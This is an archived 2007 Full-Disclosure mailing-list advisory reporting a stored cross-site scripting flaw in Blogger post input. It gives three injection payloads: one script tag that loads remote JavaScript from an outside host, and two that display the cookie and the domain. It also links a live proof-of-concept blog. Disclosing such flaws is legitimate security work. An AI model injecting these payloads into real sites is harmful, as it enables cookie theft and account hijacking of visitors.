lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 11 Aug 2007 19:22:16 +0200 From: "Daniele Costa" <info@...apware.it> To: full-disclosure@...ts.grok.org.uk Subject: BLOGGER XSS VULNERABILITY ------------------------------------------------------ BLOGGER XSS VULNERABILITY ------------------------------------------------------ Blogspot.com Homepage: http://www.blogspot.com and Blogger.com Homepage: http://www.blogger.com Affected files: Post's Input boxes ------------------------------------------------------ XSS DETAILS ------------------------------------------------------ XSS vuln via injecting javascript code into any post. Blogger doesn't sanitize user input during post process. Try injecting the following code into a post <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> or just the well known <SCRIPT >alert(document.cookie);</SCRIPT> or <SCRIPT >alert(document.domain);</SCRIPT> I've noticed that for any blog hosted at blogspot.com the cookie will be not shown. Otherwise, if the blog is located inside your web site, the cookie will be shown. This probably depends on webserver configuration... ------------------------------------------------------ Proof Of Concept ------------------------------------------------------ http://pocasiculezza.blogspot.com/ ----------------------------------------------------- HISTORY ------------------------------------------------------ Discovered : 07/11/2007 by Daniele Costa Published : 07/11/2007 by Daniele Costa -- =============== Daniele Costa CheapWare Informatica http://www.cheapware.it http://www.iteam5.net http://www.siculezza.it http://www.thetubo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists